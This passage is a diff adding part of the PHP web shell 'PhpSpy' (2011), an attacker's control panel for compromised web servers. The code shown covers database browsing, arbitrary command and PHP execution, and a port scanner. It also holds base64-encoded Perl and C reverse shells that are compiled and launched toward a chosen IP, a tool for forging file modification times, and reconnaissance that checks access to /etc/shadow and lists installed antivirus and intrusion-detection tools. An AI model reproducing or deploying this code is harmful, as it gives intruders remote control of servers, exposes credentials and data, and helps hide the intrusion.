+                                        p('<table border="0" cellpadding="3" cellspacing="0">');
+                                        p('<tr class="head">');
+                                        p('<td>Keyname</td>');
+                                        p('<td>Type</td>');
+                                        p('<td>Unique</td>');
+                                        p('<td>Packed</td>');
+                                        p('<td>Seq_in_index</td>');
+                                        p('<td>Field</td>');
+                                        p('<td>Cardinality</td>');
+                                        p('<td>Collation</td>');
+                                        p('<td>Null</td>');
+                                        p('<td>Comment</td>');
+                                        p('</tr>');
+                                        foreach ($rowdb as $row) {
+                                                $thisbg = bg();
+                                                p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+                                                p('<td>'.$row['Key_name'].'</td>');
+                                                p('<td>'.$row['Index_type'].'</td>');
+                                                p('<td>'.($row['Non_unique'] ? 'No' : 'Yes').'&nbsp;</td>');
+                                                p('<td>'.($row['Packed'] === null ? 'No' : $row['Packed']).'&nbsp;</td>');
+                                                p('<td>'.$row['Seq_in_index'].'</td>');
+                                                p('<td>'.$row['Column_name'].($row['Sub_part'] ? '('.$row['Sub_part'].')' : '').'&nbsp;</td>');
+                                                p('<td>'.($row['Cardinality'] ? $row['Cardinality'] : 0).'&nbsp;</td>');
+                                                p('<td>'.$row['Collation'].'&nbsp;</td>');
+                                                p('<td>'.$row['Null'].'&nbsp;</td>');
+                                                p('<td>'.$row['Comment'].'&nbsp;</td>');
+                                                p('</tr>');
+                                        }
+                                        tbfoot();
+                                } elseif ($doing == 'insert' || $doing == 'edit') {
+                                        $result = q('SHOW COLUMNS FROM '.$tablename);
+                                        while ($row = mysql_fetch_array($result)) {
+                                                $rowdb[] = $row;
+                                        }
+                                        $rs = array();
+                                        if ($doing == 'insert') {
+                                                p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');
+                                        } else {
+                                                p('<h2>Update record in '.$tablename.' table &raquo;</h2>');
+                                                $where = base64_decode($base64);
+                                                $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
+                                                $rs = mysql_fetch_array($result);
+                                        }
+                                        p('<form method="post" action="'.$self.'">');
+                                        p($dbform);
+                                        makehide('action','mysqladmin');
+                                        makehide('tablename',$tablename);
+                                        p('<table border="0" cellpadding="3" cellspacing="0">');
+                                        foreach ($rowdb as $row) {
+                                                if ($rs[$row['Field']]) {
+                                                        $value = htmlspecialchars($rs[$row['Field']]);
+                                                } else {
+                                                        $value = '';
+                                                }
+                                                $thisbg = bg();
+                                                p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+                                                if ($row['Key'] == 'UNI' || $row['Extra'] == 'auto_increment' || $row['Key'] == 'PRI') {
+                                                        p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td>'.$value.'&nbsp;</td></tr>');
+                                                } else {                                                        
+                                                        p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
+                                                }
+                                        }
+                                        if ($doing == 'insert') {
+                                                p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
+                                        } else {
+                                                p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
+                                                makehide('base64', $base64);
+                                        }
+                                        p('</table></form>');
+                                } else {
+                                        $querys = @explode(';',$sql_query);
+                                        foreach($querys as $num=>$query) {
+                                                if ($query) {
+                                                        p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
+                                                        switch(qy($query))
+                                                        {
+                                                                case 0:
+                                                                        p('<h2>Error : '.mysql_error().'</h2>');
+                                                                        break;  
+                                                                case 1:
+                                                                        if (strtolower(substr($query,0,13)) == 'select * from') {
+                                                                                $allowedit = 1;
+                                                                        }
+                                                                        if ($getnumsql) {
+                                                                                $tatol = mysql_num_rows(q($getnumsql));
+                                                                                $multipage = multi($tatol, $pagenum, $page, $tablename);
+                                                                        }
+                                                                        if (!$tablename) {
+                                                                                $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
+                                                                                $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
+                                                                                preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
+                                                                                $tablename = $matches[1][0];
+                                                                        }
+
+                                                                        /*********************/
+                                                                        $getfield = q("SHOW COLUMNS FROM $tablename");
+                                                                        $rowdb = array();
+                                                                        $keyfied = ''; //Ö÷¼ü×Ö¶Î
+                                                                        while($row = @mysql_fetch_assoc($getfield)) {
+                                                                                $rowdb[$row['Field']]['Key'] = $row['Key'];
+                                                                                $rowdb[$row['Field']]['Extra'] = $row['Extra'];
+                                                                                if ($row['Key'] == 'UNI' || $row['Key'] == 'PRI') {
+                                                                                        $keyfied = $row['Field'];
+                                                                                }
+                                                                        }
+                                                                        /*********************/                                                         
+                                                                        //Ö±½Óä¯ÀÀ±í°´ÕÕÖ÷¼ü½µÐòÅÅÁÐ
+                                                                        if ($keyfied && strtolower(substr($query,0,13)) == 'select * from') {
+                                                                                $query = str_replace(" LIMIT ", " order by $keyfied DESC LIMIT ", $query);
+                                                                        }
+
+                                                                        $result = q($query);
+
+                                                                        p($multipage);
+                                                                        p('<table border="0" cellpadding="3" cellspacing="0">');
+                                                                        p('<tr class="head">');
+                                                                        if ($allowedit) p('<td>Action</td>');
+                                                                        $fieldnum = @mysql_num_fields($result);
+                                                                        for($i=0;$i<$fieldnum;$i++){
+                                                                                $name = @mysql_field_name($result, $i);
+                                                                                $type = @mysql_field_type($result, $i);
+                                                                                $len = @mysql_field_len($result, $i);
+                                                                                p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>");
+                                                                        }
+                                                                        p('</tr>');
+                                                                        
+                                                                        while($mn = @mysql_fetch_assoc($result)){
+                                                                                $thisbg = bg();
+                                                                                p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+                                                                                $where = $tmp = $b1 = '';
+                                                                                //Ñ¡È¡Ìõ¼þ×Ö¶ÎÓÃ
+                                                                                foreach($mn as $key=>$inside){
+                                                                                        if ($inside) {
+                                                                                                //²éÕÒÖ÷¼ü¡¢Î¨Ò»ÊôÐÔ¡¢×Ô¶¯Ôö¼ÓµÄ×ֶΣ¬ÕÒµ½¾ÍÍ£Ö¹£¬·ñÔò×éºÏËùÓÐ×Ö¶Î×÷ΪÌõ¼þ¡£
+                                                                                                if ($rowdb[$key]['Key'] == 'UNI' || $rowdb[$key]['Extra'] == 'auto_increment' || $rowdb[$key]['Key'] == 'PRI') {
+                                                                                                        $where = $key."='".addslashes($inside)."'";
+                                                                                                        break;
+                                                                                                }
+                                                                                                $where .= $tmp.$key."='".addslashes($inside)."'";
+                                                                                                $tmp = ' AND ';
+                                                                                        }
+                                                                                }
+                                                                                //¶ÁÈ¡¼Ç¼ÓÃ
+                                                                                foreach($mn as $key=>$inside){
+                                                                                        $b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';
+                                                                                }
+                                                                                $where = base64_encode($where);
+
+                                                                                if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
+
+                                                                                p($b1);
+                                                                                p('</tr>');
+                                                                                unset($b1);
+                                                                        }
+                                                                        p('<tr class="head">');
+                                                                        if ($allowedit) p('<td>Action</td>');
+                                                                        $fieldnum = @mysql_num_fields($result);
+                                                                        for($i=0;$i<$fieldnum;$i++){
+                                                                                $name = @mysql_field_name($result, $i);
+                                                                                $type = @mysql_field_type($result, $i);
+                                                                                $len = @mysql_field_len($result, $i);
+                                                                                p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>");
+                                                                        }
+                                                                        p('</tr>');
+                                                                        tbfoot();
+                                                                        p($multipage);
+                                                                        break;
+                                                                case 2:
+                                                                        $ar = mysql_affected_rows();
+                                                                        p('<h2>affected rows : <b>'.$ar.'</b></h2>');
+                                                                        break;
+                                                        }
+                                                }
+                                        }
+                                }
+                        } else {
+                                $query = q("SHOW TABLE STATUS");
+                                $table_num = $table_rows = $data_size = 0;
+                                $tabledb = array();
+                                while($table = mysql_fetch_array($query)) {
+                                        $data_size = $data_size + $table['Data_length'];
+                                        $table_rows = $table_rows + $table['Rows'];
+                                        $table['Data_length'] = sizecount($table['Data_length']);
+                                        $table_num++;
+                                        $tabledb[] = $table;
+                                }
+                                $data_size = sizecount($data_size);
+                                unset($table);
+                                p('<table border="0" cellpadding="0" cellspacing="0">');
+                                p('<form action="'.$self.'" method="POST">');
+                                makehide('action','mysqladmin');
+                                p($dbform);
+                                p('<tr class="head">');
+                                p('<td width="2%" align="center">&nbsp;</td>');
+                                p('<td>Name</td>');
+                                p('<td>Rows</td>');
+                                p('<td>Data_length</td>');
+                                p('<td>Create_time</td>');
+                                p('<td>Update_time</td>');
+                                if ($highver) {
+                                        p('<td>Engine</td>');
+                                        p('<td>Collation</td>');
+                                }
+                                p('<td>Operate</td>');
+                                p('</tr>');
+                                foreach ($tabledb as $key => $table) {
+                                        $thisbg = bg();
+                                        p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+                                        p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
+                                        p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a></td>');
+                                        p('<td>'.$table['Rows'].'</td>');
+                                        p('<td>'.$table['Data_length'].'</td>');
+                                        p('<td>'.$table['Create_time'].'&nbsp;</td>');
+                                        p('<td>'.$table['Update_time'].'&nbsp;</td>');
+                                        if ($highver) {
+                                                p('<td>'.$table['Engine'].'</td>');
+                                                p('<td>'.$table['Collation'].'</td>');
+                                        }
+                                        p('<td><a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a></td>');
+                                        p('</tr>');
+                                }
+                                p('<tr class="head">');
+                                p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
+                                p('<td>Name</td>');
+                                p('<td>Rows</td>');
+                                p('<td>Data_length</td>');
+                                p('<td>Create_time</td>');
+                                p('<td>Update_time</td>');
+                                if ($highver) {
+                                        p('<td>Engine</td>');
+                                        p('<td>Collation</td>');
+                                }
+                                p('<td>Operate</td>');
+                                p('</tr>');
+                                p('<tr class='.bg().'>');
+                                p('<td>&nbsp;</td>');
+                                p('<td>Total tables: '.$table_num.'</td>');
+                                p('<td>'.$table_rows.'</td>');
+                                p('<td>'.$data_size.'</td>');
+                                p('<td colspan="'.($highver ? 5 : 3).'">&nbsp;</td>');
+                                p('</tr>');
+
+                                p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 9 : 7)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$dbname.".sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" value=\"Export selection table\" /></td></tr>");
+                                makehide('doing','backupmysql');
+                                formfoot();
+                                p("</table>");
+                                fr($query);
+                        }
+                }
+        }
+        tbfoot();
+        @mysql_close();
+}//end mysql
+
+elseif ($action == 'backconnect') {
+        !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
+        !$yourport && $yourport = '12345';
+        $usedb = array('perl'=>'perl','c'=>'c');
+
+        $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
+                "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
+                "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
+                "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
+                "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
+                "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
+                "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+        $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
+                "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
+                "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
+                "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
+                "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
+                "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
+                "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
+                "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+
+        if ($start && $yourip && $yourport && $use){
+                if ($use == 'perl') {
+                        cf('/tmp/angel_bc',$back_connect);
+                        $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
+                } else {
+                        cf('/tmp/angel_bc.c',$back_connect_c);
+                        $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
+                        @unlink('/tmp/angel_bc.c');
+                        $res = execute("/tmp/angel_bc $yourip $yourport &");
+                }
+                m("Now script try connect to $yourip port $yourport ...");
+        }
+
+        formhead(array('title'=>'Back Connect'));
+        makehide('action','backconnect');
+        p('<p>');
+        p('Your IP:');
+        makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
+        p('Your Port:');
+        makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
+        p('Use:');
+        makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
+        makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
+        p('</p>');
+        formfoot();
+}//end
+
+elseif ($action == 'portscan') {
+        !$scanip && $scanip = '127.0.0.1';
+        !$scanport && $scanport = '21,25,80,110,135,139,445,1433,3306,3389,5631,43958';
+        formhead(array('title'=>'Port Scan'));
+        makehide('action','portscan');
+        p('<p>');
+        p('IP:');
+        makeinput(array('name'=>'scanip','size'=>20,'value'=>$scanip));
+        p('Port:');
+        makeinput(array('name'=>'scanport','size'=>80,'value'=>$scanport));
+        makeinput(array('name'=>'startscan','value'=>'Scan','type'=>'submit','class'=>'bt'));
+        p('</p>');
+        formfoot();
+
+        if ($startscan) {
+                p('<h2>Result &raquo;</h2>');
+                p('<ul class="info">');
+                foreach(explode(',', $scanport) as $port) {
+                        $fp = @fsockopen($scanip, $port, $errno, $errstr, 1); 
+                        if (!$fp) {
+                                p('<li>'.$scanip.':'.$port.' ------------------------ <span style="font-weight:bold;color:#f00;">Close</span></li>');
+                   } else {
+                                p('<li>'.$scanip.':'.$port.' ------------------------ <span style="font-weight:bold;color:#080;">Open</span></li>');
+                                @fclose($fp);
+                   } 
+                }
+                p('</ul>');
+        }
+}
+
+elseif ($action == 'eval') {
+        $phpcode = trim($phpcode);
+        if($phpcode){
+                if (!preg_match('#<\?#si', $phpcode)) {
+                        $phpcode = "<?php\n\n{$phpcode}\n\n?>";
+                }
+                eval("?".">$phpcode<?");
+        }
+        formhead(array('title'=>'Eval PHP Code'));
+        makehide('action','eval');
+        maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
+        p('<p><a href="http://w'.'ww.4ng'.'el.net/php'.'spy/pl'.'ugin/" target="_blank">Get plugins</a></p>');
+        formfooter();
+}//end eval
+
+elseif ($action == 'editfile') {
+        if(file_exists($opfile)) {
+                $fp=@fopen($opfile,'r');
+                $contents=@fread($fp, filesize($opfile));
+                @fclose($fp);
+                $contents=htmlspecialchars($contents);
+        }
+        formhead(array('title'=>'Create / Edit File'));
+        makehide('action','file');
+        makehide('dir',$nowpath);
+        makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
+        maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
+        formfooter();
+        
+        goback();
+
+}//end editfile
+
+elseif ($action == 'newtime') {
+        $opfilemtime = @filemtime($opfile);
+        //$time = strtotime("$year-$month-$day $hour:$minute:$second");
+        $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
+        formhead(array('title'=>'Clone folder/file was last modified time'));
+        makehide('action','file');
+        makehide('dir',$nowpath);
+        makeinput(array('title'=>'Alter folder/file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
+        makeinput(array('title'=>'Reference folder/file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
+        formfooter();
+        formhead(array('title'=>'Set last modified'));
+        makehide('action','file');
+        makehide('dir',$nowpath);
+        makeinput(array('title'=>'Current folder/file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
+        p('<p>year:');
+        makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
+        p('month:');
+        makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
+        p('day:');
+        makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
+        p('hour:');
+        makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
+        p('minute:');
+        makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
+        p('second:');
+        makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
+        p('</p>');
+        formfooter();
+        goback();
+}//end newtime
+
+elseif ($action == 'shell') {
+        if (IS_WIN && IS_COM) {
+                if($program && $parameter) {
+                        $shell= new COM('Shell.Application');
+                        $a = $shell->ShellExecute($program,$parameter);
+                        m('Program run has '.(!$a ? 'success' : 'fail'));
+                }
+                !$program && $program = 'c:\windows\system32\cmd.exe';
+                !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
+                formhead(array('title'=>'Execute Program'));
+                makehide('action','shell');
+                makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
+                p('<p>');
+                makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
+                makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
+                p('</p>');
+                formfoot();
+        }
+        formhead(array('title'=>'Execute Command'));
+        makehide('action','shell');
+        if (IS_WIN && IS_COM) {
+                $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
+                makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
+        }
+        p('<p>');
+        makeinput(array('title'=>'Command','name'=>'command','value'=>htmlspecialchars($command)));
+        makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
+        p('</p>');
+        formfoot();
+
+        if ($command) {
+                p('<hr width="100%" noshade /><pre>');
+                if ($execfunc=='wscript' && IS_WIN && IS_COM) {
+                        $wsh = new COM('WScript.shell');
+                        $exec = $wsh->exec('cmd.exe /c '.$command);
+                        $stdout = $exec->StdOut();
+                        $stroutput = $stdout->ReadAll();
+                        echo $stroutput;
+                } elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
+                        $descriptorspec = array(
+                           0 => array('pipe', 'r'),
+                           1 => array('pipe', 'w'),
+                           2 => array('pipe', 'w')
+                        );
+                        $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
+                        if (is_resource($process)) {
+                                fwrite($pipes[0], $command."\r\n");
+                                fwrite($pipes[0], "exit\r\n");
+                                fclose($pipes[0]);
+                                while (!feof($pipes[1])) {
+                                        echo fgets($pipes[1], 1024);
+                                }
+                                fclose($pipes[1]);
+                                while (!feof($pipes[2])) {
+                                        echo fgets($pipes[2], 1024);
+                                }
+                                fclose($pipes[2]);
+                                proc_close($process);
+                        }
+                } else {
+                        echo(execute($command));
+                }
+                p('</pre>');
+        }
+}//end shell
+
+elseif ($action == 'phpenv') {
+        $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
+        $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
+        !$dis_func && $dis_func = 'No'; 
+        $info = array(
+                1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
+                2 => array('Server Domain',$_SERVER['SERVER_NAME']),
+                3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
+                4 => array('Server OS',PHP_OS),
+                5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
+                6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
+                7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
+                8 => array('PHP run mode',strtoupper(php_sapi_name())),
+                9 => array('The file path',__FILE__),
+
+                10 => array('PHP Version',PHP_VERSION),
+                11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:g(\'phpinfo\');">Yes</a>' : 'No')),
+                12 => array('Safe Mode',getcfg('safe_mode')),
+                13 => array('Administrator',$adminmail),
+                14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
+                15 => array('enable_dl',getcfg('enable_dl')),
+                16 => array('display_errors',getcfg('display_errors')),
+                17 => array('register_globals',getcfg('register_globals')),
+                18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
+                19 => array('memory_limit',getcfg('memory_limit')),
+                20 => array('post_max_size',getcfg('post_max_size')),
+                21 => array('upload_max_filesize',$upsize),
+                22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
+                23 => array('disable_functions',$dis_func),
+        );
+
+        if($phpvarname) {
+                m($phpvarname .' : '.getcfg($phpvarname));
+        }
+
+        formhead(array('title'=>'Server environment'));
+        makehide('action','phpenv');
+        makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
+        formfooter();
+
+        $hp = array(0=> 'Server', 1=> 'PHP');
+        for($a=0;$a<2;$a++) {
+                p('<h2>'.$hp[$a].' &raquo;</h2>');
+                p('<ul class="info">');
+                if ($a==0) {
+                        for($i=1;$i<=9;$i++) {
+                                p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+                        }
+                } elseif ($a == 1) {
+                        for($i=10;$i<=23;$i++) {
+                                p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+                        }
+                }
+                p('</ul>');
+        }
+}//end phpenv
+
+elseif ($action == 'secinfo') {
+        
+        secparam('Server software', @getenv('SERVER_SOFTWARE'));
+        secparam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
+        secparam('Open base dir', @ini_get('open_basedir'));
+        secparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
+        secparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
+        secparam('cURL support', function_exists('curl_version')?'enabled':'no');
+        $temp=array();
+        if(function_exists('mysql_get_client_info'))
+                $temp[] = "MySql (".mysql_get_client_info().")";
+        if(function_exists('mssql_connect'))
+                $temp[] = "MSSQL";
+        if(function_exists('pg_connect'))
+                $temp[] = "PostgreSQL";
+        if(function_exists('oci_connect'))
+                $temp[] = "Oracle";
+        secparam('Supported databases', implode(', ', $temp));
+        
+        if( !IS_WIN ) {
+                $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
+                $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
+                $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
+                secparam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no');
+                secparam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no');
+                secparam('OS version', @file_get_contents('/proc/version'));
+                secparam('Distr name', @file_get_contents('/etc/issue.net'));
+                $safe_mode = @ini_get('safe_mode');
+                if(!$GLOBALS['safe_mode']) {
+                        $temp=array();
+                        foreach ($userful as $item)
+                                if(which($item)){$temp[]=$item;}
+                        secparam('Userful', implode(', ',$temp));
+                        $temp=array();
+                        foreach ($danger as $item)
+                                if(which($item)){$temp[]=$item;}
+                        secparam('Danger', implode(', ',$temp));
+                        $temp=array();
+                        foreach ($downloaders as $item) 
+                                if(which($item)){$temp[]=$item;}
+                        secparam('Downloaders', implode(', ',$temp));
+                        secparam('Hosts', @file_get_contents('/etc/hosts'));
+                        secparam('HDD space', execute('df -h'));
+                        secparam('Mount options', @file_get_contents('/etc/fstab'));
+                }
+        } else {
+                secparam('OS Version',execute('ver'));
+                secparam('Account Settings',execute('net accounts'));
+                secparam('User Accounts',execute('net user'));
+                secparam('IP Configurate',execute('ipconfig -all'));
+        }
+}//end
+
+else {
+        m('Undefined Action');
+}
+
+?>
+</td></tr></table>
+<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
+        <span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
+        Powered by <a title="Build 20110502" href="http://www.4ngel.net" target="_blank"><?php echo str_replace('.','','P.h.p.S.p.y');?> 2011</a>. Copyright (C) 2004-2011 <a href="http://www.4ngel.net" target="_blank">Security Angel Team [S4T]</a> All Rights Reserved.
+</div>
+</body>
+</html>
+
+<?php
+
+/*======================================================
+º¯Êý¿â
+======================================================*/
+
+function secparam($n, $v) {
+        $v = trim($v);
+        if($v) {
+                p('<h2>'.$n.' &raquo;</h2>');
+                p('<div class="infolist">');
+                if(strpos($v, "\n") === false)
+                        p($v.'<br />');
+                else
+                        p('<pre>'.$v.'</pre>');
+                p('</div>');
+        }
+}
+function m($msg) {
+        echo '<div style="margin:10px auto 15px auto;background:#ffffe0;border:1px solid #e6db55;padding:10px;font:14px;text-align:center;font-weight:bold;">';
+        echo $msg;
+        echo '</div>';
+}
+function scookie($key, $value, $life = 0, $prefix = 1) {
+        global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife;
+        $key = ($prefix ? $cookiepre : '').$key;
+        $life = $life ? $life : $cookielife;
+        $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
+        setcookie($key, $value, $timestamp+$life, $cookiepath, $cookiedomain, $useport);
+}       
+function multi($num, $perpage, $curpage, $tablename) {
+        $multipage = '';
+        if($num > $perpage) {
+                $page = 10;
+                $offset = 5;
+                $pages = @ceil($num / $perpage);
+                if($page > $pages) {
+                        $from = 1;
+                        $to = $pages;
+                } else {
+                        $from = $curpage - $offset;
+                        $to = $curpage + $page - $offset - 1;
+                        if($from < 1) {
+                                $to = $curpage + 1 - $from;
+                                $from = 1;
+                                if(($to - $from) < $page && ($to - $from) < $pages) {
+                                        $to = $page;
+                                }
+                        } elseif($to > $pages) {
+                                $from = $curpage - $pages + $to;
+                                $to = $pages;
+                                if(($to - $from) < $page && ($to - $from) < $pages) {
+                                        $from = $pages - $page + 1;
+                                }
+                        }
+                }
